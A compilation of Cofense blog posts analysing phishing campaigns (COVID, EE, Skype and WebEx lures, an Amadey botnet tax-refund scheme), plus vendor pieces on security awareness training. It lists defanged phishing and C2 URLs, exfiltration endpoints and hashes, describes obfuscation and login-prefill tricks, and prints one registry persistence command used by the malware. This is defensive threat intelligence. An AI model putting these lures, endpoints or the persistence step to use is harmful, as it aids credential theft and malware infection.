Staff Members’ Inbox Positive for Coronavirus Themed Phish

By Ashley Tran, Cofense Phishing Defense Center

From prime ministers, members of congress to celebrities and staff of nursing homes — many have been affected by COVID-19. And the worst part? Threat actors know this and are heavily weaponizing this pandemic, exploiting the fears and concerns of users everywhere. The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign found in environments protected by Microsoft and Symantec that not only impersonates a company’s management but also suggests that a fellow employee has tested positive for the disease, urging users to read an enclosed malicious attachment posed as “guidelines” or “next steps.”

As we have seen before and noted in previous Cofense blogs and media stories, Coronavirus themed phishing attacks are running rampant and attacking users across all industries. Although the attacks vary in method, the main takeaway is the same: all users must exercise the utmost caution and restraint in the face of emotionally jarring emails.

Figures 1-3: Email Bodies

The PDC has found multiple instances of this attack and a trend among them all. As demonstrated in Figures 1-3, the email subject lines are relatively similar: “Staff Member Confirmed COVID 19 Positive ID,” followed by a random string of numbers and that day’s date. The emotion these subject lines evoke in users are also the same: fear and curiosity. Emails appearing to be a “Team Update on COVID 19” and bearing their company’s name can convince end users to believe the email was sent internally. However, the true senders are revealed via the return paths:

Maga[@]tus[.]tusdns[.]com and ungrez[@]ssd7[@]linuxpl[.]com

Admittedly these emails would appear suspicious to most, but the threat actor is relying on the emotional subject line to overcome logic and push users to read just the first line of the sender information and nothing more.

The bodies of the emails have more variety and are worded differently, but the same main point: a fellow employee has the virus, so read this guideline we’ve attached to get more details or at least learn the “next steps” to take. To top it off the email is signed by “Management.”

The true part of this attack lies within the HTML file found in the email.

Figure 4 shows that the attachment has been detected as malicious by a multitude of services, however users won’t see this when they read the email.

Figure 4: VirusTotal Analysis

Figure 5: Phishing Page

Upon opening the attachment users are presented with a generic Microsoft login page, a frequently targeted brand. The difference with this phish, however, is the threat actor has superimposed the login box over a blurred document that may appear to users as the previously mentioned “guidelines” lending an even greater sense of legitimacy.

The email of the recipient is automatically appended to the username field via code in the HTML. In fact, the threat actor has painstakingly put the base64 for each of the recipient’s email addresses, which is then translated to a readable format when interacting with the phish. This snippet of code can be observed in Figure 6.

Figure 6: Email Bodies

Once a user navigates to the next page and inputs their password, the information is then sent to the compromised site:

hxxp://tokai-lm[.]jp/style/89887cc/5789n[.]php?98709087-87634423

This exchange of information can be viewed by opening developer tools on any browser and navigating to the networking tab as shown in Figure 7.

Figure 7: Phishing Page

The code found within the HTML file that hosts the phishing content employs typical malicious tactics. For example, as seen in Figure 8, the code does not look like a typical HTML code. This is because the threat actor has attempted to obfuscate their code, to make analysis as well as detection harder. However, this is nothing new for phishing campaigns that choose to utilize a HTML file. De-obfuscating the code and revealing some its methods is not difficult.

Figure 8: Obfuscated Code

To begin, the code is notably broken into different parts. Each of these parts may stand out to anyone with an eye for encoding as being Hex text and base64. These both can easily be decoded back into their original form, the true HTML code, by utilizing tools such as RapidTables and Base64 Decode.

Figure 9: De-obfuscated Code

After de-obfuscating the code, the true HTML is seen in Figure 9, revealing the threat actor has compromised, or at the very least utilized, a compromised site to host the style sheet for their phish:

hxxp://ibuykenya[.]com/vendor/doctrine/styles[.]css

Figure 10: Open Directory with Phish Resource Files

The following is the directory which the threat actor has used to store the style sheet for the phish, along with what appears to be two additional files, based on their last modified dates.

Within the code, the image seen in the background of the document can also be recovered. The image is hosted on ImgBB, yet another relatively benign image hosting site to which threat actors flock to host images for their attacks.

hxxps://i[.]ibb[.]co/dMcjCWC/image[.]png

Figure 11: Document Preview from Phish

Upon closer observation, the title of the document can be obtained. With a quick search, the image the threat actor has used to further legitimize this login page in the eyes of the user can be linked back to the legitimate document found in Figure 12.

Figure 12: Legitimate Document Utilized by Threat Actor

All these steps – the social engineering, the obfuscated code, use of official COVID health advisories and more-are designed to ensure users don’t detect the phishing attack is in progress. This phish also demonstrates the attacker’s need to employ layered techniques designed to avoid detection by email gateways, as well as the incident responder’s need for the right investigative tools to properly analyze, detect and quarantine this threat.

Network IOC IP
hxxp://tokai-lm[.]jp/style/89887cc/5789n[.]php?98709087-87634423150[.]60[.]156[.]116

 

How Cofense Can Help

Visit Cofense’s Coronavirus Phishing Infocenter to stay up to date as threats evolve. Our site is updated with screenshots and YARA rules as we continue to track campaigns. (edited) 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Targeted Attack Uses Fake EE Email to Deceive Users

By Kian Mahdavi and Tej Tulachan, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has discovered a spear-phishing campaign designed to defraud corporate executives’ payment details by spoofing EE, a well-known UK-based telecommunications and internet service provider.  These spear phishing messages were reported to the Cofense PDC by end users whose email environments are protected by Microsoft 365 EOP and Symantec. This new, targeted campaign shows that while exploiting well-known telecommunications brands is nothing new, such phishing emails continue to go undetected by popular email gateways designed to protect end users, leading to possible theft of prized corporate credentials

Figure 1: Email Body

Threat actors sent a targeted email to a few executives, including one at a leading financial firm, with the subject line reading ‘View Bill – Error’ from a purchased top-level domain (moniquemoll[.]nl). These details in and of themselves may raise red flags to eagle-eyed recipients, as EE’s trademarked name isn’t included in any part of the full email address.

The malicious URL inserted within the text is:

hXXps://fly-guyz[.]com/ee[.]co[.]uk[.]edcnymdsqmnydqnyo

The vague email indicates ‘we’re working to get this fixed’. At no point does the email give an indication what this error is. As we read on, the second hyperlink states ‘view billing to make sure your account details are correct’ to entice the recipient to click the phishing link.

The threat actor fails to include the correct registered office address, evident towards the bottom of the email. Once the threat actor’s social engineering does the trick and the user clicks one of the links, they are redirected to a phishing page.

Noted in Figure 2 below is the trusted HTTPS protocol (also displayed as the green padlock) within the URL, giving false hope to the user that network traffic is being encrypted, ensuring all data transferred between the browser and website is secure and not being eavesdropped on.

However, the threat actor even went to the trouble of obtaining SSL certificates for the domain to further gain end users’ trust. In fact, it has become much easier for site owners, including fraudsters, to obtain these certificates.

Figures 2 and 3: First and second phishing pages

The peculiar aspect is the message in which the threat actor included: ‘You will not be charged’ to reassure recipients and trick them into providing their payment information.  The user is then automatically redirected to the legitimate EE website, as displayed below in Figure 4, to avoid suspicion. This is a common tactic to make the user believe the session timed out or their password was mistyped.

Figure 4: Legitimate Redirect Login Page

At the time of writing, the phishing page is still live and active. To further validate the analysis of the investigation, we decided to input some fake credentials, allowing us to verify the transmitted TCP requests and redirects to the fraudster’s domain at hXXps://kbimperial[.]com/data[.]php.

Figure 5: TCP Retransmission Packets

Indicators of Compromise:

Network IOCIP
hXXps://fly-guyz[.]com/ee[.]co[.]uk[.]edcnymdsqmnydqnyo/
hXXps://kbimperial[.]com/ee[.]co[.]uk[.]edcnymdsqmnydqnyo/logins
hXXps://kbimperial[.]com/data[.]php?
104[.]31[.]82[.]7
104[.]31[.]83[.]7
35[.]208[.]71[.]62

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

This Phish Uses Skype to Target Surging Remote Workers

By Harsh Patel

The Cofense Phishing Defense Center (PDC) recently unearthed a new phishing campaign spoofing Skype, the popular video calling platform that has seen a recent spike in use amid the need to keep employees connected as they work remotely. This phishing attack was found in email environments protected by Proofpoint and Microsoft 365 EOP, landing in end-users’ inboxes.

With so many people working from home, remote work software like Skype, Slack, Zoom, and WebEx are starting to become popular themes of phishing lures. We recently uncovered an interesting Skype phishing email that an end user reported to the PDC.

Figures 1 and 2: Email Body

For this attack, the threat actor created an email that looks eerily similar to a legitimate pending notification coming from Skype. The threat actor tries to spoof a convincing Skype phone number and email address in the form of 67519-81987[@]skype.[REDACTED EMAIL]. While the sender address may appear legitimate at first glance, the real sender can be found in the return-path displayed as “sent from,” which also happens to be an external compromised account. Although there are many ways to exploit a compromised account, for this phishing campaign the threat actor chose to use it to send out even more phishing campaigns masquerading as a trusted colleague or friend.

It is not uncommon to receive emails about pending notifications for various services. The threat actor anticipates users will recognize this as just that, so they take action to view the notifications. Curiosity and the sense of urgency entice many users to click the “Review” button without recognizing the obvious signs of a phishing attack.

Upon clicking ‘Review’ users will be redirected via an app.link:

hxxps://jhqvy[.]app[.]link/VAMhgP3Mi5

Finally, to the end phishing page:

hxxps://skype-online0345[.]web[.]app

The threat actor has chosen to utilize a .app top-level domain to host their attack. This TLD is backed by Google to help app developers securely share their apps. A benefit of this top-level domain is that it requires HTTPS to connect to it, adding security on both the user’s and developer’s end, which is great…but not in this case. The inclusion of HTTPS means the addition of a lock to the address bar, which most users have been trained to trust. Because this phishing site is being hosted via Google’s .app TLD it displays this trusted icon.

Figure 3: Phishing Page

Clicking the link in the email, the user is shown an impersonation of the Skype login page. If a well-trained user inspects the URL, they will see that the URL contains the word Skype (hxxps://skype-online0345[.]web[.]app). To add even further sense of authenticity, the threat actor adds the recipient’s company logo to the login box as well as a disclaimer at the bottom warning this page is for “authorized use” of that company’s users only. The username is auto-filled due to the URL containing the base64 of the target email address, thus adding simplicity to the phishing page and leaving little room for doubt. The only thing left for the user to do is to enter his or her password, which then falls into the hands of the threat actor.

 

Network IOCs
hxxps://jhqvy[.]app[.]link/VAMhgP3Mi5
hxxps://skype-online0345[.]web[.]app

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

New Phishing Campaign Spoofs WebEx to Target Remote Workers

By Ashley Tran, Cofense Phishing Defense Center

The Cofense Phishing Defense Center  (PDC) has observed a new phishing campaign that aims to harvest Cisco WebEx credentials via a security warning for the application, which Cisco’s own Secure Email Gateway fails to catch. In the midst of the COVID-19 pandemic, millions of people are working from home using a multitude of online platforms and software. Attackers, of course, know this and are exploiting trusted brands like WebEx to deliver malicious emails to users.

Targeting users of teleconferencing brands is nothing new. But with most organizations adhering to guidelines that non-essential workers stay home, the rapid influx of remote workers is prime picking for attackers trying to spoof brands like WebEx. We anticipate there will continue be an increase in remote work phishing in the months to come.

Here’s how this campaign works:

Figure 1: Email Body

For this attack, the threat actor sends an email with varying subject lines such as “Critical Update” or “Alert!” from the spoofed address “meetings[@]webex[.]com”. With the subject and mail content combined, this may gauge users’ curiosity enough to entice them click in order to take the requested action.

The email then explains there is a vulnerability the user must patch or risk allowing an unauthenticated user to install a “Docker container with high privileges on the system.” In this scenario, the threat actor has spoofed a legitimate business service and explained a problem with their software, prompting even non-technical readers to read further. The threat actor even links to a legitimate write-up for the vulnerability, found at the URL embedded into the text ‘CVE-2016-9223:

hxxps://cve[.]mitre[.]org/cgi-bin/cvename.cgi?name=CVE-2016-9223

The linked article uses the same words as the email, lending further credibility.

The only thing for a responsible user to do next is follow the instructions in the email and update their Desktop App, right?

Even if more cautious users hover over the ‘Join’ button before clicking, they could still very well believe it’s legitimate. The URL embedded behind it is:

hxxps://globalpagee-prod-webex[.]com/signin

While the legitimate Cisco WebEx URL is:

hxxps://globalpage-prod[.]webex[.]com/signin

At a first glance, both URLs look eerily similar. A closer look, however, reveals an extra ‘e’ is added to ‘globalpage.’ Likewise, instead of ‘prod.webex’, the malicious link is ‘prod-webex’.

To carry out this attack, the threat actor registered a fraudulent domain through Public Domain Registry just days before sending out the credential phishing email.

The attacker has even gone as far as obtaining a SSL certificate for their fraudulent domain to gain further trust from end users. While the official Cisco certificate is verified by HydrantID, the attacker’s certificate is through Sectigo Limited. Regardless of who verified the attacker’s certificate, the result is the same – a lock to the left of its URL that renders the email legitimate the eyes of many users.

Figure 2:  Initial Phishing Page

The phishing page to which users are redirected is identical to the legitimate Cisco WebEx login page; visually there is no difference. Behavior-wise, there is a deviation between the real site and the fraudulent page. When email addresses are typed into the real Cisco page, the entries are checked to verify if there are associated accounts. With this phishing page, however, any email formatted entry takes the recipient to the next page where they then requested to enter their password.

Figure 3: Secondary Phishing Page

Once credentials are provided, users are redirected to the official Cisco website to download WebEx, which may be enough to convince most users it is a legitimate login process to update their WebEx app.

Figure 4: Legitimate Redirect Page – Official Cisco WebEx Download Page

At the time of writing, this fraudulent domain is still live and active. In fact, when navigating to the main domain, there is an open directory showing files the threat actor has utilized with this attack.

Figure 5: Open Directory

Files of interest include ‘sign-in%3fsurl=https%[…]’ and ‘out.php’.

The file ‘sign-in%3fsurl=https%[…]’ is the phishing page itself. When users click from this directory, they are redirected to the fraudulent WebEx login (Figure 3).

Figure 6: ‘out.php’ File

The ‘out.php’ file, seen in Figure 6, is the mailer the threat actor appears to have used to send this attack to users’ inboxes. The threat actor can manually input any subject they want – in this case, they chose “Critical Update!!”, adding the HTML for the email to the box below and designating an email list to which they wish to mass send this campaign.

With many organizations quickly adopting remote working policies, threat actors are poised to continue to spoof brands that facilitate virtual collaboration and communication, such as teleconferencing tools and cloud solutions.

Indicators of Compromise:

Network IOCIP
hxxps://globalpagee-prod-webex[.]com/signin192[.]185[.]214[.]109

 

How Cofense Can Help

Visit Cofense’s Coronavirus Phishing Infocenter to stay up to date as threats evolves. Our site is updated with screenshots and YARA rules as we continue to track campaigns.

Every day, the Cofense Phishing Defense Center (PDC) analyzes phishing emails that bypassed email gateways, 75% of which are credential phish.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence. Cofense Intelligence customers received further information about this threat in Active Threat Report (ATR) 37308 and received YARA rule PM_Intel_CredPhish_37308. Cofense Intelligence customers who would like to keep up with the Active Threat Reports and indicators being published, all COVID-19 campaigns are tagged with the “Pandemic” search tag.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

The Value of Human Intelligence in Phishing Defense

By Guest Blogger, Frank Dickson, Program Vice President, Cybersecurity Products, IDC

The value of humans, our fellow employees, in phishing defense has been a hotly contested topic for quite some time. Advocates say that end users play a role, be it innocent and unintended, in just about every phishing campaign. Proper behavior modification can ultimately solve the problem. Detractors only to need point to the consistent “clickiness” of end users to question that value. Yet the reality is that responsibility lies somewhere in the middle.

The detractors are indeed correct. Users do continue to click on malicious links and participate in other unintended ways. Training helps a lot, improving the effectiveness of a user’s ability to spot malicious email. Even though the human eye improves, cyber miscreants are clever, and even the best of us get tricked on an off day. However, what the detectors fail to acknowledge is that for a user to click on a link in a phishing email, the email first had to get past our messaging defenses—our organization’s security technology.

The Additive Factor

Here lies the crux of the argument: People are not perfect; but neither is technology. When you look at phishing, that pretty well sums up the problem. There’s so much complexity associated with IT architectures that, as of right now, the existing technology is:

A) clearly not getting it done, and
B) just too immensely complex to let any single technology fully cover it.

Malicious emails are getting through. Luckily though, technology defenses and human intelligence are not mutually exclusive. They are additive; both can be used together and, in fact, complement each other.

The factor that makes human intelligence so compelling is in the way it’s applied. As we look at layering technologies atop other technologies, we often wonder if we are indeed increasing our efficacy, or would less technology stop the same malicious emails? With human intelligence, it is only applied to emails that have gotten past our messaging security technologies. By default, human intelligence can only identify new threats.

Case in point: even if you do a great job taking out spam and malware, you still have malicious messages that get through. In the case of a compromised business email account, someone can grab credentials and take control of it. An email can appear to come from the CEO with a fictitious invoice sent to accounting saying, “Please pay this invoice.” The invoice gets paid—without the use of malware or a malicious link, right?

The email comes from a legitimate email box. Everything is “legitimate,” it’s just someone compromised the credentials. Dealing with that kind of use case is incredibly difficult. The long story short here is the complexity. Technology is great for dealing with standardized problems. When the complexity increases exponentially, however, human intelligence stands a better chance at inferring malicious intent.

Additionally, humans can scale, each applying a unique intelligence. If a malicious email gets past our technology defenses and into 10 inboxes, it only takes one out of those 10 people say, “Hmm, this doesn’t look right,” and report it. Essentially, security intelligence is crowdsourced.

The Feedback Imperative

Keep in mind, however, that human intelligence is neither free nor easy. It takes a commitment to make it work. Training users on what to look for is a good start. Users need background in terms of what’s in a malicious email, what does legitimate email look like, and what are the warning signs. You must give them the rudimentary training. That’s step one. Step two requires simulations, providing pop quizzes, for example, of obvious scenarios.

Training and simulations are great, but those by themselves are not the key. The key is the feedback loop. End users want to contribute. They want to be part of the solution. Sometimes IT thinks, “Ah, those silly end users. Easier not to keep them involved.”

But users want to know they are valued. They don’t want to feel like their time’s being wasted. If no one gets back to them and tells them that, hey, their feedback is important, then the user reasonably thinks, “I’m just wasting my time.” In addition to refining an end-user’s ability to detect malicious email, feedback from IT says, “Yes, your input was both considered and important.”

And that is the most effective security you can have.

By Tonia Dudley

The advent of the modern-day shopping mall was in the mid-1950’s and it continued to rise in popularity as the go-to place for shopping in the decades thereafter. Watching the hit series Stranger Things is a great reminder of the mall experience, but how times have changed with the introduction and boom of the internet. Retailers shifted their approach to stay relevant in the online era by standing up websites to accompany their brick & mortar locations.

Today we see retail outlets that exist solely in the web sphere – without any type of building. They are prime targets not only for consumer fraud but also cyber-attacks on retail data and reputations. The online marketplace excels in delivering goods quickly to the “I need to have it now” buyer. Threat actors excel too. They are masters at leveraging this urgency, as well as today’s delivery methods, to lure shoppers into scams.

And consumers aren’t the only targets. Attackers go after employees at retail organizations with phishing emails designed to steal customer data and create a PR nightmare. When this happens, consumers naturally think twice about buying again.

83% of consumers are concerned about purchasing from a company that was previously breached.

60% of POS compromises started with a phishing attack.

Source: 2019 Generali Global Assistance Cyber & Digital Protection Survey

What does this all mean when it comes to the phishing threat landscape? Consumers generally require a username and password to place an order on most websites. Based on threat intelligence from our research teams here at Cofense™, we know that threat actors primarily craft emails designed to steal credentials, both from consumers to gain access to online accounts and from retail employees to gain a foothold in an organization and compromise further. This is why it is critical for retail organizations to ensure their support staff have been trained to identify and report phishing attempts to gain access to their credentials.

29% of all breaches involve stolen credentials.

Source: 2019 Verizon Data Breach Investigations Report

Cofense partnered with the Retail ISAC this past summer to conduct a benchmark study. Participants ranged from small to large organizations. It is clear that organizations with an easy reporting method – a button within the mail client – are more resilient to defending against a phishing threat.

Figure 1: Susceptibility and resiliency rates for manual reporting vs. email button-based reporting, average

Figure 2: Susceptibility and resiliency rates for reporting by user group size

Retail organizations are no different than other industries – to effectively defend against phishing attacks, they need visibility of attacks that have bypassed existing controls. It takes more than a Secure Email Gateway and phishing Computer Based Training to enable Security Teams to respond quickly and reduce the risk of compromise or data breach. Cofense is uniquely positioned to help retail organizations unite to fight phishing through our comprehensive phishing defense portfolio.

To learn more about retail phishing attacks and how Cofense can help, view our new infographic.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

Quit Faking It—Train Your Users to Stop Real Phish

By Tonia Dudley

CofenseTM was the pioneer of phishing simulation as a training method to defend against phishing incidents. We’ve evolved our products and methodology as we understand that real phish are the real problem. What has also evolved over time is the depth of our scenario templates—when threat actors shift to use a new tactic to make their way past the secure email gateway (SEG), Cofense is able to quickly offer a scenario based on that tactic.

When we say, “Real phish are the real problem” we mean organizations should set their phishing defense strategy from end to end. This starts with how we provide simulation training, teaching users how to identify phish and react, and then how Security Operations teams mitigate the potential incident. Training against real phish, the ones your organization actually faces, is essential.

Let’s look at data to tell the story. It comes from our recently published Annual Phishing Report 2019. Looking at the data in Figure 1, which specifically related to “real phish,” we can see organizations that use templates based on real phishing emails (active threats) have far better results. Not only is the report rate higher, but we see the susceptibility rate also lower, ultimately affecting the overall resiliency rate.

Figure 1

When an organization has been running their program for a few years, they begin to wonder how much is enough and whether they should keep sending scenarios. We point to the phishing emails reported by our customers in our Cofense Phishing Defense CenterTM (PDC). More than 90% of emails reported came from environments that use a SEG. While the SEG is absolutely necessary to protect an organization, like any other defense it’s not infallible against threat actors who continually adjust their tactics to make their way into the inbox. This is why it’s vital to align your training scenarios to what gets past your SEG.

Taking another view, we see what happens with two common templates available for simulation campaigns. The first one is made to look similar to a social media message users might receive if they associate their work email with this site. You can see the click rate is fairly low. Are the threat actors really spending that much time making a phishing email look this fancy?

The second template looks very simplistic and our security awareness operator is less likely to select this template. It appears too basic, nobody would actually click the message, right? Yet, there is a much higher click rate on this template that mimics a real phishing message.

So are you preparing your organization to detect and report real phishing emails? Are you preparing them to defend against the actual messages that make it past your SEG? Our data shows that keeping it real makes a real difference.

View our report to learn other ways to double your resiliency to phishing.

 

HOW ELSE COFENSE CAN HELP

Most phishing threats observed by the Cofense Phishing Defense Center  bypassed secure email gateways. Condition users to be resilient to evolving phishing attacks with Cofense PhishMeTM and remove the blind spot with Cofense ReporterTM.

Quickly turn user reported emails into actionable intelligence with Cofense TriageTM. Reduce exposure time by rapidly quarantining threats with Cofense VisionTM.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense IntelligenceTM.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

Cofense Labs Has Identified a Sextortion Botnet in the Wild – and it’s Growing

By Tonia Dudley, Cofense Security Solutions

Every day, CofenseTM threat analysts and researchers monitor phishing and cyber security threats in the wild. In June of 2019, our researchers uncovered a sextortion botnet that contained a list of 200 million email addresses. Read the original announcement here.

That database has since grown to over 330 million email addresses.

We have also identified an increase in the number of unique web domains being targeted by the botnet. When we released our original findings, the database had close to 6 million unique domains. That total has grown to 7.4 million unique domains.

To be clear, this threat is not a breach of any Cofense data or systems. Rather, it’s a botnet that our research team discovered out in the wild. The botnet uses email addresses and credentials which we believe were acquired via a series of breaches over the past decade. Visit our info center for additional resources.

Fig. Sample containing text as images to deceive automated analysis

Cofense LabsTM has created a sextortion lookup tool to check impacted accounts and domains as well as a resource center with helpful tips on how to protect your organization and your personal accounts from falling victim to these types of threats as well as the steps you can take should you receive a sextortion scam.

Cofense Labs will continue to monitor the botnet and share updates on our Twitter handles @Cofense and @CofenseLabs.

HOW COFENSE SOLUTIONS CAN HELP

Reports of sextortion and other ransom scams to the Cofense Phishing Defense CenterTM are increasing. Condition users to be resilient to evolving phishing attacks with Cofense PhishMeTM and remove the blind spot with Cofense ReporterTM.

Quickly turn user reported emails into actionable intelligence with Cofense TriageTM. Reduce exposure time by rapidly quarantining threats with Cofense VisionTM.

Attackers do their research. Every SaaS platform you use is an opportunity for attackers to exploit it. Understand what SaaS applications are configured for your domains – do YOUR research with Cofense CloudSeekerTM.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

Rethinking Security Awareness? Fine-Tune Your Simulations

Part 2 of 2

In part 1 of this short series, we gave tips on re-energizing a mature security awareness program. We noted the importance of reassessing your organization’s risk profile and communicating with users as you educate them on phishing. For part 2, let’s look at anti-phishing through the lens of simulated threats.

How to Refocus Your Phishing Simulations

If you manage a security awareness program, you need to educate users on phishing emails that land in their inboxes—active threats like malware, business email compromise (BEC), or sextortion. This means talking to your SOC to understand the threats your business faces, then running simulations of those same threats. The objective isn’t just to educate users to spot phishing but to condition them to report threats, so the SOC can respond faster.

If you’ve been running simulations for some time, here are proven ways to reinvigorate your program.

Give Users an Easy Way to Report

To repeat, reporting is what you’re after. Make it easy for ALL users to report a suspicious message by giving them an EZ button. Cofense PhishMeTM customers can (and should) deploy Cofense ReporterTM, our email toolbar button that lets you report with one click.

If users don’t report threats, the SOC is blind while the danger spreads. Well-conditioned users become human sensors that send valuable threat intelligence to your security teams.

Send Targeted Simulations

As you build resiliency across your organization, send different simulations to different kinds of users:  high-value targets in human resources or finance, repeat clickers, and new hires/new users. You’ll also  want to continue sending campaigns to your full population.

Simulate Emerging and Active Threats

The phishing scenarios in Cofense PhishMe are based on real threats, thanks to constant input from our threat intelligence teams. For example, we see a lot of emerging threats, those observed in the wild, using phony invoices and purchase orders. Threat actors have a good understanding of how organizations process payments and emulate those methods to disarm users.

If something seems familiar, users are more likely to open an attachment or click links to filesharing sites like Sharepoint. Another example: users often feel safe using sites that display the HTTPS prefix and padlock symbol. They look for these on e-commerce sites asking them to enter personal information. There’s been an uptick in threat actors leveraging HTTPS in phishing emails, so you might use this tactic in your simulations.

Also be sure to send simulations that mirror active threats—phishing emails that get past your organization’s secure email gateway (SEG). Again, communicate with your SOC to learn the latest examples. If your organization is a Cofense TriageTM and Cofense VisionTM customer, these incident response solutions can give you deeper insight.

As your phishing awareness program matures it needs to stay current with your phishing risk. Teach users to report more nuanced attacks should they breach the perimeter. To counter today’s threats, your organization, all of it, needs to keep up with the times.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

New Phishing Campaign Targets U.S. Taxpayers by Dropping Amadey Botnet

The Cofense Phishing Defense CenterTM  has detected a new wave of attacks targeting the US taxpayer by delivering Amadey botnet via phishing emails. Amadey is a relatively new botnet, first noted late in Q1 of 2019. Known for its simplicity, it is available to hire for a very steep price compared to other commercially available botnets with similar functionality. Threat groups like TA505 have been known to leverage Amadey botnet as recently as July 2019 to deliver secondary malware like FlawedAmmy (RAT) and email stealers.

Here’s how a typical attack works:

Figure 1: Infection chain

Figure 2: Email Body

The email body reports to be from the Internal Revenue Service (IRS) and claims that the recipient is eligible for a tax refund. The recipient is presented with a “one time username and password” and urged to click the “Login Right Here” button. As seen above in figure 1, the login button is an embedded Hyperlink and redirects to hxxp://yosemitemanagement[.]com/fonts/page5/. Here the recipient is presented with an IRS login page to enter the one-time password.

Figure 3: Infection Page 

Once the recipient is logged into the fake IRS portal they are informed that they have “1 pending refund” and asked to download a document, print and sign, then either mail it back or upload a copy to the portal. When the recipient clicks to download the document, a zip file called “document.zip” is presented, which contains a Visual Basic script dropper.

Fig 4. Obfuscated vbs Script

The VBScript is highly obfuscated and encrypted. For more details on how this VBScript was decoded, please take a look at the Cofense™ Labs detailed write-up, which can be found here.

At a high level, once executed the script decrypts itself at run time and drops an executable file called “ZjOexiPr.exe” in C:\Users\Byte\AppData\Local\Temp\. Once dropped it then proceeds to install the executable kntd.exe in C:\ProgramData\0fa42aa593 and execute the process.

Figure 5: Persistence 

The Amadey process installs itself in C:\ProgramData\0fa42aa593 and to maintain persistence it uses Reg.exe, a command line tool for editing the registry. Next the script issues the command “REG ADD “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders” /f /v Startup /t REG_SZ /d C:\ProgramData\0fa42aa593”

Figure 6: C2 channels

Amadey instantly beacons out to its command and control (C2) channels sending system diagnostic information back to the C2 server and awaits further instructions. Amadey connects out via HTTP on port 80 to multiple C2 servers.

Figure 7: Network Traffic

If we take a closer look at the HTTP traffic we can see that Amadey sends system information back to its C2 server.

From the values given we can infer that:

ID – Unique identifier of the infected system

VS – Version of Amadey

OS – Operating system

AV – Antivirus

PC – System name

UN – Username

Additional Analysis:

Cofense Labs takes this analysis a bit deeper to deobfuscate the malware. To learn more, check out the Lab Notes on this analysis: https://cofenselabs.com/i-see-what-you-did-there/

Indicators of Compromise (IOCs):

Malware Artifacts

File MD5 Hash Value
document.zip7f9a3244d23baed3b67416e32eb949bd
a4-155QFYXY.vbs79d24672fff4c771830b4c53a7079afe
kntd.exea046030e2171ddf787f06a92941d37ca

 Network Connections

URL IP
hxxp://yosemitemanagement[.]com/fonts/page5/160[.]153[.]138[.]163
hxxp://ledehaptal[.]ru/f5lkB/index[.]php78[.]40[.]109[.]187
hxxp://nofawacat[.]com/f5lkB/index[.]php179[.]43[.]139[.]222
hxxp://Ip[.]hoster[.]kz192[.]4[.]58[.]78

 

HOW COFENSE CAN HELP

Cofense Resources

Cofense PhishMeTM offers a phishing simulation, “Tax Refund Notice –Amadey Botnet,” to educate users on the attack described in today’s blog.

89% of phishing threats delivering malware payloads analysed by the Cofense Phishing Defense Center bypassed secure email gateways. Condition users to be resilient to evolving phishing attacks with Cofense PhishMe.

Remove the blind spot with Cofense ReporterTM—give users a one-click tool to report suspicious messages, alerting security teams to potential threats.

Quickly turn user reported emails into actionable intelligence with Cofense TriageTM. Reduce exposure time by rapidly quarantining threats with Cofense VisionTM.

